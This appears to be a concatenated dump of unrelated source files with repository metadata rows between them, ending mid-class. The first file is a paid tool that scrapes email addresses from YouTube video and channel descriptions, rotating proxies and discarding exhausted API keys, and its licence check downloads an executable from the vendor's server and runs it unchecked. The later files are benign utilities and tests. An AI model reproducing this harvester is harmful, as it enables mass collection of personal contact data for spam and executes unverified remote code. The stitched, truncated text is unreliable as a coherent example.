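# is intentionally never called: Engine() below drives the tool interactively, and
# constructing VideosSearch assumes a non-empty proxy.txt, which RequestCore reads.
def _example_search(query="lofi hip hop"):
    search = VideosSearch(query, limit=5)
    results = search.result()["result"]
    for item in results:
        print(item["title"], item["link"])
    # Fetch full details for the first hit (dict result mode).
    details = Video.get(results[0]["link"], mode=ResultMode.dict)
    print(details["viewCount"])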
init()
logger.remove() # Remove the default handler
logger.add(sink=sys.stdout,
format='<green>{time:YYYY-MM-DD HH:mm:ss.SSS}</green> | <level>{level: <8}</level> | <level>{message}</level>')
re_year = '"publishedAt": "(.*)",'
re_onlyyear= r'^(\d+)-'
re_email = '(?:[A-Za-z0-9!#$%&\'*+\\/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&\'*+\\/=?^_`{|}~-]+)*|\\"(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21\\x23-\\x5b\\x5d-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])*\\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\\[(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?|[a-z0-9-]*[a-z0-9]:(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21-\\x5a\\x53-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])+)\\])'
class Engine():
def __init__(self):
check = requests.post('https://api.ytmailer.pro/index.php',data={'hwid':HWID})
if check.status_code == 200:
check = json.loads(check.text)
if check['status'] == True:
hwid_new = check['hwid']
salt = 'ytsoft139392924992491dds'
if (hashlib.md5((HWID+salt).encode())).hexdigest() != hwid_new:
sys.exit()
else:
check_v = requests.post('https://api.ytmailer.pro/index.php',data={'hwid':HWID,'version':__version__}).json()
if check_v['status']:
logger.success(f'Найдена новая версия.. Обновляемся ({check_v["version"]})')
with open(f'YTparser-{check_v["version"]}.exe','wb') as file:
file.write(requests.get(check_v['url']).content)
os.system(f'YTparser-{check_v["version"]}.exe')
sys.exit()
else:
logger.info(f'Ваш HWID: {HWID}')
logger.error('У вас нет подписки! Отправьте ваш HWID продавцу')
input()
sys.exit()
else:
logger.error('Сервер на тех. Работах. Нажмите любую кнопку!')
input()
sys.exit()
self.apis = self.read_file("API.txt")
self.keys = self.read_file("keywords.txt")
self.blackwords = self.read_file("blackwords.txt")
self.proxys = self.read_file('proxy.txt')
self.emails = 0
os.system('title "@wxkssy | Tg bot: @qualityshop24_bot"')
num_threads = int(input(Fore.GREEN + '> Enter number of threads: ' + Style.RESET_ALL))
self.videocount = 0
while (True):
self.year = input(Fore.GREEN + '> Enter max channel reg-year: ' + Style.RESET_ALL)
if self.year.isdigit():
self.year = int(self.year)
if (self.year > 2000):
break
while (True):
self.views = input(Fore.GREEN + '> Enter min channel views: ' + Style.RESET_ALL)
if self.views.isdigit():
self.views = int(self.views)
break
while True:
self.subs = input(Fore.GREEN + '> Enter min & max subs: ' + Style.RESET_ALL)
if not '-' in self.subs:
self.subs = input(Fore.GREEN + '> Enter min & max subs: ' + Style.RESET_ALL)
else:
self.subs = [int(self.subs.split('-')[0]), int(self.subs.split('-')[1])]
if (self.subs[0] < self.subs [1]):
break
self.blacklist = input(Fore.GREEN + '> Enter blacklist (y/n): ' + Style.RESET_ALL)
if self.blacklist.lower() != 'y':
self.blackwords = ''
logger.info(f'Max Year: {self.year} | Min Views: {self.views} | Subs: {self.subs[0]}-{self.subs[1]}')
sleep(1)
threads = []
for i in range(num_threads):
t = threading.Thread(target=self.process_data)
threads.append(t)
for t in threads:
t.start()
threading.Thread(target=self.console_log).start()
for t in threads:
t.join()
logger.info('Данные закончились, завершение...')
input("Нажми ENTER, чтобы завершить")
def read_file(self,filename):
with open(filename, 'r',encoding='utf-8',errors='ignore') as f:
return f.read().split('\n')
def process_data(self):
proxies = {
'http': f'http://{random.choice(self.proxys)}',
}
while True:
try:
if self.apis == [] or self.keys == []:
break
api = random.choice(self.apis)
key = random.choice(self.keys)
search = VideosSearch(key, limit=50)
try:
self.keys.remove(str(key))
except:
pass
videoIds = search.result()
while True:
try:
for videoID in videoIds['result']:
description = ''
if videoID['descriptionSnippet'] != None:
for _ in videoID['descriptionSnippet']:
description += _['text'] + ' '
email = re.findall(re_email, description)
channelId = videoID['channel']['id']
while True:
try:
api = random.choice(self.apis)
resp = requests.get(f'https://www.googleapis.com/youtube/v3/channels?part=statistics%2Csnippet&maxResults=50&id={channelId}&key={str(api)}',proxies=proxies)
if resp.status_code == 200:
resp_rez = resp.json()["items"][0]
break
else:
try:
self.apis.remove(api)
except:
pass
if self.apis == []:
break
except:
proxies = {
'http': f'http://{random.choice(self.proxys)}',
}
if self.apis == []:
return
while True:
try:
vid = videoID['id']
except:
res3 = []
break
try:
api = random.choice(self.apis)
resp = requests.get(f"https://youtube.googleapis.com/youtube/v3/videos?part=snippet&part=contentDetails&part=statistics&id={vid}&key={api}",proxies=proxies)
if resp.status_code == 200:
res3 = re.findall(re_email, resp.text.replace(r"\n", ""))
break
else:
try:
self.apis.remove(api)
except:
pass
if self.apis == []:
break
except:
proxies = {
'http': f'http://{random.choice(self.proxys)}',
}
if self.apis == []:
return
yearid = int(resp_rez['snippet']['publishedAt'][:4])
                            # Subscriber count
try:
subscount = resp_rez["statistics"]["subscriberCount"]
except Exception:
subscount = 0
try:
viewscount = resp_rez["statistics"]["viewCount"]
except:
viewscount = 0
try:
countryId = resp_rez["snippet"]["country"]
except Exception:
countryId = 'Not'
if countryId in self.blackwords:
pass
else:
if res3 != []:
if self.year >= int(yearid):
if self.subs[0] <= int(subscount) and self.subs[1] >= int(subscount):
if self.views <= int(viewscount):
for mail in res3:
self.write_mail(f"emails.txt", mail)
if email != []:
if self.year >= int(yearid):
if self.subs[0] <= int(subscount) and self.subs[1] >= int(subscount):
if self.views <= int(viewscount):
for mail in email:
self.write_mail(f"emails.txt", mail)
                            # Channel description
try:
descriptionCN = resp_rez["snippet"]["description"]
except Exception:
descriptionCN = ''
emailDesc = re.findall(re_email, descriptionCN)
if emailDesc != []:
if self.year >= int(yearid):
if self.subs[0] <= int(subscount) and self.subs[1] >= int(subscount):
if self.views <= int(viewscount):
for mail in emailDesc:
self.write_mail(f"emails.txt", mail)
self.videocount += 1
try:
search.next()
videoIds = search.result()
except:
break
nextpage = len(videoIds['result'])
if nextpage == 0:
break
except:
pass
except:
pass
def write_mail(self,filename, data):
x = self.read_file(filename)
with open(filename, 'a+',encoding='utf-8') as f:
if data not in x:
f.write(str(data) + '\n')
self.emails += 1
def console_log(self):
while True:
os.system('cls' if os.name == 'nt' else 'clear')
logger.info(f'ApiKeys: {len(self.apis)} | KeyWords: {len(self.keys)} | Emails: {self.emails} | Video_seen: {self.videocount}')
sleep(5)
Engine()
|
basautomaticaly/work
|
main2-5.py
|
main2-5.py
|
py
| 46,695 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30609616360
|
import numpy as np
import os
import Tools.FilesTool as FilesTool
import imblearn.over_sampling as over_sampling
class DataSetTool:
    # Metric compensation as in the 2008 version
# Mij in Target = (Mij in Target * Mean(Mj in Source)) / Mean(Mj) in Target
@staticmethod
def metric_compensation(source, target):
        # Iterate over every metric attribute
for j in range(target.shape[1]):
            # Compute the mean of each metric attribute
metric_mean_source = np.mean(source[:, j])
metric_mean_target = np.mean(target[:, j])
            # Iterate over every sample
for i in range(target.shape[0]):
target[i, j] = (target[i, j] * metric_mean_source) / metric_mean_target
return target
    # Metric compensation adjusted in the 2017 version
# Mij in Source = (Mij in Source * Mean(Mj in Target)) / Mean(Mj) in Source
@staticmethod
def metric_compensation_adopt(source, target):
        # Iterate over every metric attribute
for j in range(source.shape[1]):
            # Compute the mean of each metric attribute
metric_mean_source = np.mean(source[:, j])
metric_mean_target = np.mean(target[:, j])
            # Iterate over every sample
for i in range(source.shape[0]):
source[i, j] = (source[i, j] * metric_mean_target) / metric_mean_source
return source
    # Read all files under the folder and return the processed data set
    # metrics_num: number of metrics (columns in the raw data, excluding the label column)
    # is_sample: whether to resample (oversampling)
    # is_normalized: whether to normalize the data
@staticmethod
def init_data(folder_path, metrics_num, is_sample=True, is_normalized=True):
        # Get all raw files in the directory
files = os.listdir(folder_path)
data_list, label_list = [], []
for file in files:
            # Real path of each file
file_path = folder_path+file
            # txt file
if 'txt' == FilesTool.file_type(file) or 'TXT' == FilesTool.file_type(file):
                # Read the file directly
data_file = np.loadtxt(file_path, dtype=float, delimiter=',', usecols=range(0, metrics_num+1))
label_file = np.loadtxt(file_path, dtype=float, delimiter=',', usecols=metrics_num+1)
if is_normalized:
                    # Normalize the data
data_file -= data_file.min()
data_file /= data_file.max()
label_file -= label_file.min()
label_file /= label_file.max()
                # Append to the lists
data_list.append(data_file)
label_list.append(label_file)
        # Resampling
if is_sample:
for index in range(len(data_list)):
data_list[index], label_list[index] = over_sampling.SMOTE(kind='regular').fit_sample(data_list[index],
label_list[index])
return data_list, label_list
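# Illustrative toy example of the metric compensation above: each target value M_ij is
# rescaled by mean(source column j) / mean(target column j), so the column means of the
# compensated target end up matching those of the source. The numbers are made up.
if __name__ == "__main__":
    src = np.array([[2.0, 10.0], [4.0, 30.0]])   # column means: 3, 20
    tgt = np.array([[1.0, 5.0], [3.0, 15.0]])    # column means: 2, 10
    compensated = DataSetTool.metric_compensation(src, tgt.copy())
    print(compensated)                # [[1.5, 10.], [4.5, 30.]]
    print(compensated.mean(axis=0))   # [3., 20.] -- now aligned with the source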
|
ylxieyu/HYDRA
|
DataSetTool.py
|
DataSetTool.py
|
py
| 3,100 |
python
|
en
|
code
| 5 |
github-code
|
6
|
70675296187
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
from ..pki.migrate_data import migrate_pki_data
class Migration(migrations.Migration):
dependencies = [
('ssl_pki', '0002_default_config'),
]
operations = [
migrations.RunPython(migrate_pki_data, migrations.RunPython.noop),
]
|
ngageoint/exchange
|
exchange/sslpki/migrations/0001_migrate_pki_data.py
|
0001_migrate_pki_data.py
|
py
| 361 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71087023548
|
"""
Tests for the server.
Before running them, the server database should be restarted.
Run as: python server/tests/test_all.py (don't use py.test as it does not pass env variables easily)
"""
import os
import shutil
from pathlib import Path
from typing import List
import pytest
from requests.exceptions import HTTPError
import numpy as np
from src.al_loop import LeadCompound
from server.app import WORKSHOP_ORACLES
from solutions.task1.random_loop import RandomLoop
from src.server_wrapper import FlaskAppClient
from rich.console import Console
console = Console()
PORT = int(os.environ.get("PORT", "5000"))
BASE_URL = "http://127.0.0.1:" + str(PORT)
BASE_URL = "http://mlinpl23.ngrok.io"
TEST_TOKEN_PREFIX = 'test-' # test-0, test-1, ...
def test_submitting_compounds_to_workshop_oracles():
"""Submits three simple molecules to the server using token test-0, to all workshop oracles."""
client = FlaskAppClient(base_url=BASE_URL)
token = TEST_TOKEN_PREFIX + '0'
# Example for scoring compounds
for oracle in WORKSHOP_ORACLES:
compounds = ["CCCCCCCCC", "CCCCCCCC", "CCCCCC=O"]
response = client.score_compounds_and_update_leaderboard(compounds, oracle, token)
print(response)
assert "metrics" in response
assert "compound_scores" in response
assert "compound_sas_scores" in response
def _run_random_exploration(protein, token="test-1", steps=10):
"""Simple random exploration of ZINC. Should get above >0.5 score on each oracle."""
base_dir = Path("tmp")
shutil.rmtree(base_dir, ignore_errors=True)
client = FlaskAppClient(base_url=BASE_URL)
loop = RandomLoop(base_dir=base_dir,
user_token=token,
target=protein)
all_result: List[LeadCompound] = []
budget_per_step = 100
for step in range(steps):
console.print(f"[red]Step {step}[/red]")
candidates = loop.propose_candidates(budget_per_step)
loop.test_in_lab_and_save(candidates, client=client)
result: List[LeadCompound] = loop.load(iteration_id=step)
all_result += result
all_result_sorted = sorted(all_result, key=lambda x: x.activity, reverse=True)
metrics = {"top10": np.mean([x.activity for x in all_result_sorted[:10]]),
"top10_synth": np.mean([x.synth_score for x in all_result_sorted[:10]])}
console.log(metrics)
return metrics
def test_random_exploration_gets_reasonable_score():
for protein in [ 'GSK3β', 'DRD2_server', 'JNK3']:
console.log("Testing: " + protein)
metrics = _run_random_exploration(protein=protein)
assert metrics['top10'] > 0.1, "Random search should identify reasonable compounds"
def test_leaderboard_ordering_and_user_names():
_run_random_exploration('DRD2_server', 'test-2', steps=1)
_run_random_exploration('DRD2_server', 'test-3', steps=1)
client = FlaskAppClient(base_url=BASE_URL)
all_results = client.all_results()
users = [r['user'] for r in all_results]
print(users)
assert 'user-2' in users
assert 'user-3' in users
all_proteins = ['DRD2', 'JNK3', 'GSK3β']
    sums = [sum([r['metrics'][p + "_top_10"] for p in all_proteins]) for r in all_results]
assert sums[0] == max(sums), "First result in the leaderboard should be the maximum sum of top10 scores"
def test_call_limits():
base_dir = Path("tmp")
token = 'test-10'
shutil.rmtree(base_dir, ignore_errors=True)
loop = RandomLoop(base_dir=base_dir,
user_token=token,
target='DRD2')
client = FlaskAppClient(base_url=BASE_URL)
# exhaust limit
candidates = loop.propose_candidates(1000)
loop.test_in_lab_and_save(candidates, client=client)
# run one time more
candidates = loop.propose_candidates(100)
with pytest.raises(RuntimeError):
client.score_compounds_and_update_leaderboard([c.smiles for c in candidates], user_token=token, oracle_name='DRD2')
def test_get_all_scores():
base_dir = Path("tmp")
token = 'test-40'
shutil.rmtree(base_dir, ignore_errors=True)
loop = RandomLoop(base_dir=base_dir,
user_token=token,
target='GSK3β_server')
client = FlaskAppClient(base_url=BASE_URL)
# exhaust limit
candidates = loop.propose_candidates(100)
candidates = loop.test_in_lab_and_save(candidates, client=client)
# run one time more
console.log(client.all_scores(token))
assert len(client.all_scores(token)['compound_sas_scores']['GSK3β']) == len(candidates)
assert len(client.all_scores(token)['compound_scores']['GSK3β']) == len(candidates)
if __name__ == "__main__":
test_submitting_compounds_to_workshop_oracles()
test_random_exploration_gets_reasonable_score()
test_leaderboard_ordering_and_user_names()
test_call_limits()
test_get_all_scores()
console.log("[green] Tests passed [/green]")
|
molecule-one/mlinpl-23-workshops
|
server/tests/test_all.py
|
test_all.py
|
py
| 4,995 |
python
|
en
|
code
| 1 |
github-code
|
6
|
13954857960
|
par=[]
for i in range(100):
par.append(i)
def find(u):
if u==par[u]:
return u
    par[u]=find(par[u]) # Path compression
return par[u]
def merge(u,v):
u,v=find(u),find(v)
if u==v:
return
par[u]=v # without Union-By-Rank
merge(1,5)
merge(2,5)
merge(4,1)
print(find(5)==find(4))
print(find(0)==find(1))
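# Hedged sketch of the union-by-rank variant that merge() above notes it omits; the
# `rank` array exists only for this sketch. Hanging the shorter tree under the taller
# one keeps find() with path compression close to constant amortized time.
rank = [0] * 100
def merge_by_rank(u, v):
    u, v = find(u), find(v)
    if u == v:
        return
    if rank[u] < rank[v]:
        u, v = v, u          # ensure u is the root with the larger rank
    par[v] = u
    if rank[u] == rank[v]:
        rank[u] += 1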
|
MilkClouds/SCSC-2019
|
서로소 집합.py
|
서로소 집합.py
|
py
| 359 |
python
|
en
|
code
| 0 |
github-code
|
6
|
38093772023
|
from time import sleep
from HW_03.my_decorator import DecorTimeCrit
@DecorTimeCrit(critical_time=0.45)
class Test:
def method_1(self):
print('slow method start')
sleep(1)
print('slow method finish')
def method_2(self):
print('fast method start')
sleep(0.1)
print('fast method finish')
def execute_time_method_check():
t = Test()
t.method_1()
t.method_2()
if __name__ == '__main__':
execute_time_method_check()
# slow method start
# slow method finish
# WARNING! method_1 slow. Time = ??? sec.
# fast method start
# fast method finish
|
alisa-moto/python-adnanced
|
HW_03/class_for_decorator.py
|
class_for_decorator.py
|
py
| 616 |
python
|
en
|
code
| 0 |
github-code
|
6
|
4769452267
|
#!/usr/bin/env python
import sys
import os
def deserialize_anno(parts):
# Frame name formatted as <task ID><6 digit frame ID>
frame_name = parts[0]
track_id = parts[1]
x = float(parts[2])
y = float(parts[3])
box_width = float(parts[4])
box_height = float(parts[5])
class_id = parts[7]
#print(frame_name, track_id, box_left, box_top, box_width, box_height, class_id)
return frame_name, track_id, x, y, box_width, box_height, class_id
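# Illustrative, hypothetical annotation line run through the helper above; the exact
# column layout (including the skipped column at index 6) is an assumption for the demo.
if __name__ == "__main__":
    line = "3000123,7,100.0,150.0,40.0,80.0,1.0,salmon"
    print(deserialize_anno(line.split(",")))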
|
Salmon-Computer-Vision/salmon-computer-vision
|
utils/utils.py
|
utils.py
|
py
| 455 |
python
|
en
|
code
| 4 |
github-code
|
6
|
859362304
|
from __future__ import division
from vistrails.core.modules.vistrails_module import Module
from ..common import get_numpy
from ..read.read_numpy import NumPyArray
class WriteNumPy(Module):
"""Writes a list as a Numpy file.
NumPy can use one of two schemes: either 'plain' binary arrays, i.e. just
the binary representation of the data format (in this case you must specify
the exact format to get the original data back), or the NPY format, i.e.
.npy files that know what the actual structure of the array is.
"""
_input_ports = [
('array', '(org.vistrails.vistrails.basic:List)'),
('datatype', '(org.vistrails.vistrails.basic:String)',
{'entry_types': "['enum']",
'values': "[%r]" % NumPyArray.FORMATS})]
_output_ports = [('file', '(org.vistrails.vistrails.basic:File)')]
def compute(self):
numpy = get_numpy()
array = self.get_input('array')
if not isinstance(array, numpy.ndarray):
array = numpy.array(array)
dtype = NumPyArray.get_format(self.get_input('datatype'))
if dtype is NumPyArray.NPY_FMT:
fileobj = self.interpreter.filePool.create_file(suffix='.npy')
fname = fileobj.name
# Numpy's ".NPY" format
numpy.save(fname, array)
else:
fileobj = self.interpreter.filePool.create_file(suffix='.dat')
fname = fileobj.name
# Numpy's plain binary format
array.astype(dtype).tofile(fname)
self.set_output('file', fileobj)
_modules = [WriteNumPy]
###############################################################################
import unittest
class WriteNumpyTestCase(unittest.TestCase):
def test_raw_numpy(self):
"""Uses WriteNumPy to write an array in raw format.
"""
import array
from vistrails.tests.utils import execute, intercept_result
from ..identifiers import identifier
with intercept_result(WriteNumPy, 'file') as results:
self.assertFalse(execute([
('write|WriteNumPy', identifier, [
('array', [('List', '[0, 1, 258, 6758]')]),
('datatype', [('String', 'uint32')]),
]),
]))
self.assertEqual(len(results), 1)
expected_bytes = [0, 0, 0, 0,
1, 0, 0, 0,
2, 1, 0, 0,
102, 26, 0, 0]
with open(results[0].name, 'rb') as fp:
self.assertEqual(fp.read(),
array.array('B', expected_bytes).tostring())
def test_npy_numpy(self):
"""Uses WriteNumPy to write an array in .NPY format.
"""
import numpy
from vistrails.tests.utils import execute, intercept_result
from ..identifiers import identifier
with intercept_result(WriteNumPy, 'file') as results:
self.assertFalse(execute([
('write|WriteNumPy', identifier, [
('array', [('List', '[0, 1, 258, 6758]')]),
('datatype', [('String', 'npy')]),
]),
]))
self.assertEqual(len(results), 1)
self.assertEqual(list(numpy.load(results[0].name)), [0, 1, 258, 6758])
def test_write_read(self):
"""Uses WriteNumPy and NumPyArray to write then read an array.
"""
from vistrails.tests.utils import execute, intercept_result
from ..identifiers import identifier
for dtype in ('npy', 'uint32'):
with intercept_result(NumPyArray, 'value') as results:
self.assertFalse(execute([
('write|WriteNumPy', identifier, [
('array', [('List', '[0, 1, 258, 6758]')]),
('datatype', [('String', dtype)]),
]),
('read|NumPyArray', identifier, [
('datatype', [('String', dtype)]),
]),
], [
(0, 'file', 1, 'file'),
]))
self.assertEqual(len(results), 1)
self.assertEqual(list(results[0]), [0, 1, 258, 6758])
|
VisTrails/VisTrails
|
vistrails/packages/tabledata/write/write_numpy.py
|
write_numpy.py
|
py
| 4,325 |
python
|
en
|
code
| 100 |
github-code
|
6
|
10844685453
|
from database import db
from flask import request
from middleware.auth import login_required, admin_only
from models.guild import Guild
from typing import Dict, Optional, Tuple
def check_request(req: request, id_only: Optional[bool] = False) -> int | Tuple[int, str, bool] | Tuple[Dict[str, str], int]:
# Check request body
guild_name = ''
guild_manage_threads = False
try:
guild_id = req.json['id']
if not isinstance(guild_id, int):
raise ValueError('id must be an integer')
if not id_only:
guild_name = req.json.get('name', guild_name)
guild_manage_threads = req.json.get('manage_threads', guild_manage_threads)
if 'name' in req.json and not isinstance(guild_name, str):
raise ValueError('name must be a string')
if 'name' in req.json and not 0 < len(guild_name) < 256:
            raise ValueError('name must be between 1 and 255 characters long')
if 'manage_threads' in req.json and not isinstance(guild_manage_threads, bool):
raise ValueError('manage_threads must be a boolean')
except KeyError as e:
return {
'success': False,
'error': f'Missing key in request body: {e}'
}, 400
except ValueError as e:
return {
'success': False,
'error': f'Bad value: {e}'
}, 400
else:
if id_only:
return guild_id
else:
return guild_id, guild_name, guild_manage_threads
@admin_only
def add_guild():
# Check request body
check_result = check_request(request)
if isinstance(check_result[0], dict):
return check_result
guild_id, guild_name, guild_manage_threads = check_result
# Check if guild is already in DB
guild = Guild.query.get(guild_id)
if guild is not None:
return {
'success': False,
'error': 'Guild already exists'
}, 409
# Create guild
guild = Guild(
id=guild_id,
name=guild_name,
manage_threads=guild_manage_threads
)
# Add to DB
db.session.add(guild)
db.session.commit()
return {
'success': True
}
@admin_only
def update_guild():
# Check request body
check_result = check_request(request)
if isinstance(check_result[0], dict):
return check_result
guild_id, guild_name, guild_manage_threads = check_result
# Check if guild is already in DB
guild = Guild.query.get(guild_id)
if guild is None:
return {
'success': False,
'error': f'Guild {guild_id} does not exist'
}, 404
# Update existing guild
if 'name' in request.json:
guild.name = guild_name
if 'manage_threads' in request.json:
guild.manage_threads = guild_manage_threads
# Commit
db.session.commit()
return {
'success': True
}, 200
@admin_only
def delete_guild():
# Check request body
check_result = check_request(request, id_only=True)
if isinstance(check_result, tuple) and isinstance(check_result[0], dict):
return check_result
guild_id = check_result
# Check if guild is in DB
    guild = Guild.query.get(guild_id)
    if guild is None:
        return {
            'success': False,
            'error': 'Guild not found'
        }, 404
    # Delete guild
    db.session.delete(guild)
    db.session.commit()
    return {
        'success': True
    }, 200
@login_required
def get_guild():
# Check request body
check_result = check_request(request, id_only=True)
if isinstance(check_result, tuple) and isinstance(check_result[0], dict):
return check_result
guild_id = check_result
# Check if guild is in DB
guild = Guild.query.get(guild_id)
if guild is None:
return {
'success': False,
'error': 'Guild not found'
}, 404
# Return guild data
return {
'success': True,
'guild': {
'name': guild.name,
'manage_threads': guild.manage_threads
}
}, 200
|
jareddantis-bots/rico-backend
|
api/guilds.py
|
guilds.py
|
py
| 4,053 |
python
|
en
|
code
| 0 |
github-code
|
6
|
29456781892
|
from six.moves.urllib import parse
import tarfile
from lxml import etree
from atrope import exception
SPECS = {
'http://www.vmware.com/interfaces/specifications/vmdk.html': 'vmdk',
'https://people.gnome.org/~markmc/qcow-image-format.html': 'qcow',
}
def _get_tarfile(ova):
if not tarfile.is_tarfile(ova):
raise exception.CannotOpenFile(reason="not a valid 'tar' file")
return tarfile.open(ova)
def extract_file(ova, filename):
tf = _get_tarfile(ova)
fd = tf.extractfile(filename)
return fd
def get_disk_name(ovf):
"""Get the disk format and file name from a OVF descriptor."""
root = etree.fromstring(ovf)
ovf_ns = root.nsmap['ovf']
id_attr = '{%s}id' % ovf_ns
href_attr = '{%s}href' % ovf_ns
files = {f.get(id_attr): f.get(href_attr) for f in
root.findall('ovf:References/ovf:File', root.nsmap)}
# we do not care about more than one disk
disk = root.find('ovf:DiskSection/ovf:Disk', root.nsmap)
if disk is not None:
format_attr = '{%s}format' % ovf_ns
fileref_attr = '{%s}fileRef' % ovf_ns
ovf_format = disk.get(format_attr)
if not ovf_format:
raise Exception("Expecting some format!")
(format_url, _) = parse.urldefrag(ovf_format)
try:
disk_format = SPECS[format_url]
except KeyError:
raise Exception("Unknown format!")
try:
disk_file = files[disk.get(fileref_attr)]
except KeyError:
raise Exception("Unknown disk!")
return (disk_format, disk_file)
return None, None
def get_ovf(ova):
"""Return an OVF descriptor as stored in an OVA file, if any."""
tf = _get_tarfile(ova)
ovf = None
for name in tf.getnames():
if name.endswith(".ovf"):
ovf = tf.extractfile(name).read()
break
if ovf is None:
raise exception.InvalidOVAFile(reason="cannot find a .ovf descriptor")
return ovf
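# Illustrative, hypothetical flow for the helpers above: pull the .ovf descriptor out of
# an OVA and resolve the disk format plus the disk image name inside the archive.
# "appliance.ova" is a placeholder path, not a file shipped with this project.
if __name__ == "__main__":
    ovf_descriptor = get_ovf("appliance.ova")
    disk_format, disk_file = get_disk_name(ovf_descriptor)
    print(disk_format, disk_file)                 # e.g. ('qcow', 'disk.img')
    image_fd = extract_file("appliance.ova", disk_file)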
|
alvarolopez/atrope
|
atrope/ovf.py
|
ovf.py
|
py
| 1,986 |
python
|
en
|
code
| 2 |
github-code
|
6
|
30137635
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import requests
import json
url = "http://localhost:6332"
headers = {'content-type': 'application/json'}
def get_result(payload):
response = requests.post(
url, data=json.dumps(payload), headers=headers).json()
return json.dumps(response)
def get_all_address():
payload = {
"method": "getalladdress",
"params": {},
"jsonrpc": "2.0",
"id": 1,
}
content = json.loads(get_result(payload))
content=content["result"]
address_arr=[]
for (v) in content:
address=v.split("-")[2]
address_arr.append(address)
return json.dumps(address_arr)
def get_balance():
payload = {
"method": "getbalance",
"params": {},
"jsonrpc": "2.0",
"id": 1,
}
content = json.loads(get_result(payload))
pending=(content["result"]["base"]["pending"])/1000000
stable=(content["result"]["base"]["stable"])/1000000
balance=pending+stable
return json.dumps({"balance":balance,"pending":pending,"stable":stable})
def check_address(address):
payload = {
"method": "checkAddress",
"params": [address],
"jsonrpc": "2.0",
"id": 1,
}
return get_result(payload)
def pay(address,amount,msg):
if not msg:
payload = {
"method": "sendtoaddress",
"params": [address,amount*1000000],
"jsonrpc": "2.0",
"id": 1,
}
else:
payload = {
"method": "sendtoaddresswithmessage",
"params": [address,amount*1000000,msg],
"jsonrpc": "2.0",
"id": 1,
}
return get_result(payload)
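# Illustrative, hypothetical driver for the JSON-RPC helpers above; it assumes a wallet
# node is listening on localhost:6332 as configured at the top of this file. Note that
# pay() takes amounts in whole units and multiplies by 1,000,000 before sending.
if __name__ == "__main__":
    print(get_balance())        # {"balance": ..., "pending": ..., "stable": ...}
    print(get_all_address())    # JSON list of bare addresses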
|
taozywu/token_light
|
rpc.py
|
rpc.py
|
py
| 1,701 |
python
|
en
|
code
| 0 |
github-code
|
6
|
25240137017
|
n, f = map(int, input().split())
ciclo = list(map(int, input().split()))
PrimeiroDia = 1
UltimoDia = 10**8
while PrimeiroDia < UltimoDia:
aux = int((PrimeiroDia + UltimoDia) / 2)
total = 0
for i in range(len(ciclo)):
total = total + (aux // ciclo[i])
if total >= f:
UltimoDia = aux
else:
PrimeiroDia = aux + 1
print(UltimoDia)
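# Note on the search above: it binary-searches the day number. For a candidate day `aux`
# the total number of capsules taken so far is sum(aux // c for c in ciclo), and the
# loop keeps the smallest day on which at least f capsules have been taken.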
|
MateusFerreiraMachado/Programas_Python
|
capsulas.py
|
capsulas.py
|
py
| 376 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
27161595951
|
# Written by RF
while True:
Q=float(input("What number would you like to square? "))
H=float(input("How many times would you like to square it? "))
S=((Q)**H)
print("The", H, "square is", S)
while True:
answer = str(input('Anything else? (y/n): '))
if answer in ('y', 'n'):
break
print("invalid input.")
if answer == 'y':
continue
else:
print("Godspeed")
break
|
GustavMH29/Python
|
Code/Math/Equations/Square.py
|
Square.py
|
py
| 450 |
python
|
en
|
code
| 0 |
github-code
|
6
|
39687962974
|
# Time:O(n)
# Space:O(n)
from typing import List

class Solution:
def productExceptSelf(self, nums: List[int]) -> List[int]:
left_prod = [1]
for num in nums:
left_prod.append(left_prod[-1]*num)
        # Build the suffix products by appending and reversing once; calling
        # insert(0, ...) in a loop would make this step O(n^2) rather than O(n).
        right_prod = [1]
        for num in reversed(nums):
            right_prod.append(right_prod[-1]*num)
        right_prod.reverse()
op = []
for i in range(1, len(nums)+1):
op.append(left_prod[i-1]*right_prod[i])
return op
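# Worked example of the arrays above: for nums = [1, 2, 3, 4] they become
#   left_prod  = [1, 1, 2, 6, 24]    (left_prod[i] = nums[0] * ... * nums[i-1])
#   right_prod = [24, 24, 12, 4, 1]  (right_prod[i] = nums[i] * ... * nums[-1])
# and the answer is op = [24, 12, 8, 6], i.e. left_prod[i-1] * right_prod[i].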
|
cmattey/leetcode_problems
|
30DayChallenge_April/april_15_product_except_self.py
|
april_15_product_except_self.py
|
py
| 446 |
python
|
en
|
code
| 4 |
github-code
|
6
|
73815074426
|
from user.models import User
from rest_framework import exceptions
def get_user(username):
user = None
if "@" in username:
try:
user = User.objects.get(email=username)
except User.DoesNotExist:
user = User.objects.create(
username=username,
email=username
)
elif username.isdigit():
try:
user = User.objects.get(phone_no=username)
except User.DoesNotExist:
user = User.objects.create(
username=username,
phone_no=username
)
else:
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
raise exceptions.NotFound("User matching username was not found!")
return user
|
Python-Crew/base_drf
|
auth_user/services.py
|
services.py
|
py
| 815 |
python
|
en
|
code
| 1 |
github-code
|
6
|
9758869645
|
from app import app, db
import json
from tests.lib import login
def test_get_products():
client = app.test_client()
response = client.get("/api/products")
assert len(response.json) == 27
assert response.status_code == 200
def test_get_single_product():
client = app.test_client()
response = client.get("/api/products/1")
assert response.json["product_name"] == "White Trainers"
assert response.status_code == 200
|
hannahakhtar/golden-shoes
|
server/tests/test_products.py
|
test_products.py
|
py
| 454 |
python
|
en
|
code
| 0 |
github-code
|
6
|
33387732761
|
import numpy as np
from sklearn.tree import DecisionTreeClassifier
from .sampler import FeatureSampler, ObjectSampler
class Bagger:
def __init__(self, base_estimator, object_sampler, feature_sampler, n_estimators=10, **params):
"""
n_estimators : int
number of base estimators
base_estimator : class
class for base_estimator with fit(), predict() and predict_proba() methods
feature_sampler : instance of FeatureSampler
